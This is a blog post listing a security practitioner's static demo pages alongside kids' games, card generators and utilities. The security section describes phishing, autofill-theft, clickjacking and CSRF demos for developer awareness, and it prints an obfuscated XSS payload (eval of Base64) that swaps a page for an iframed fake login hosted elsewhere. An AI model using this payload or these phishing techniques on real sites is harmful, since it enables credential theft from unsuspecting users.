Useful static apps! (Updated)

Posted on

Sometimes i make static pages for single purpose and they can be quite useful so i will just leave them here

For security

Here is a simple page to show case some useful Content Security Policy (CSP) tricks for protecting apps from XSS I find sharing this page and some explanation get buy in from developers a lot quicker.

Here is my example to show why it is a good idea to host user’s provided content, especially ones where user has full control over, SSRF/proxied-pages in a completely separated domain. Google is no exception: This way cross origin policy will protect your web app from being attacked with XSS style attack.

Here is a fun XSS trick i had… This is useful when you notice your variable being injected/server-side render straight into an inline script code block This trick mess with how browser first parse HTML document to figure out different HTML tags and not having any context about Javascript.

A fun fake login page: you can either iframe it This is example to rewrite the html body and change it to our fakelogin page:

<img src=x onerror=eval(atob('ZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9IjxpZnJhbWUgc3JjPVwiaHR0cHM6Ly9lYmZlLnB3L3NoYXJlZC9mYWtlbG9naW4uaHRtbFwiIHN0eWxlPVwid2lkdGg6MTAwJTsgaGVpZ2h0OjEwMHZoXCIgLz4i'))>

QRCode generator using js library

My phishing page to show case IDN homograph attack:, it used to get internal ip ranges using webrtc but that seems to be broken nowand it uses a nice trick at the bottom to determine what social network you are logging into.

Open blank-Changing parent tab <– does what it says:

<a href="" target="_blank"></a>

CSRF test page generates a csrf form submit page base off your “copy as curl command” from burp. Although under engagementtool you do have a generate cfrf PoC page anyway. :p Oh well, whateva

Pikachu is a static page that would try to steal your autofill info. put ?debug=true at the end of the url to see how it work or ?cc=true and see if it can steal creditcard autofil stuffs Unfortunately chrome has made it more obvious by showing the drop down selection for autofill values.

This page used to clickjack your browser and make your facebook like a page about picklecat :) Unfortunately my picklecat page was removed and with the Chrome fix for SameSite, this may not be a problem sooner or later. That said, you could potentially modify the source to make an useful demo.

Games for kids and adults =))

A cardgenerator app i made to create printable A4 pages of card game for security training (for the best experience, use cardstock paper):

Same concept as above, i made a flashcard generator for my wife to use to teach childcare kids:

StarRealm deck building game simple point counter

Arm wrestling bible (Made after I lost at arm wrestling to a much bigger dude)

A hangman game for kindies kid… with image hint after 6 wrong pick - Although perhaps it is not suitable for children since it is…“hang man” …

A text-to-speech scenario game for kids: The idea is to act it out and follow the narative for each scenario.


Code Highlight using JS that you can use to copy to word document:

QRCode generator using js library

A cidr calculator page that include calculation for terraform cidrsubnet() function.